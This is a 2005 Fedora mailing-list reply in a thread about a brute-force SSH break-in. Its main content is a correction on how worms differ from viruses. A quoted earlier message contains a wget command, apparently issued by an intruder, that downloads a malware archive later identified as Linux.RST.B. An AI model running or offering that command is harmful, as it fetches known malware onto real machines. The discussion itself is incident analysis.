brute force ssh attack

Paul Howarth paul at city-fan.org
Wed May 4 07:11:06 UTC 2005


On Wed, 2005-05-04 at 08:58 +0800, John Summerfied wrote:
> Gustavo Seabra wrote:
> > On 4/27/05, Håkan Persson <hakan at zyberit.com> wrote:
> > 
> >>Daniel Kirsten wrote:
> >>
> >>
> >>>wget www.ring.as.ro/x/qwe.tgz
> >>>
> >>>
> >>
> >>This is what Symantec thinks of the content of the file:
> >>http://securityresponse.symantec.com/avcenter/venc/data/linux.rst.b.html
> >>
> >>/Håkan
> > 
> > 
> > Well, so much for the "do not wory about viruses in Linux machines" stories...
> > 
> 
> This is not a virus: it does not travel via email or the like. This is a 
> worm, and there are a few of those.

I think you're got those the wrong way around. Worms can propagate
without luser intervention, regular viruses can't. Consider for example
the entire class of boot sector viruses, which used to be quite common.
None of those could work without someone carelessly booting from an
infected floppy. Similarly in this case, the virus can't propagate
without someone (preferably root) executing an infected file.

Paul.
-- 
Paul Howarth <paul at city-fan.org>




More information about the fedora-list mailing list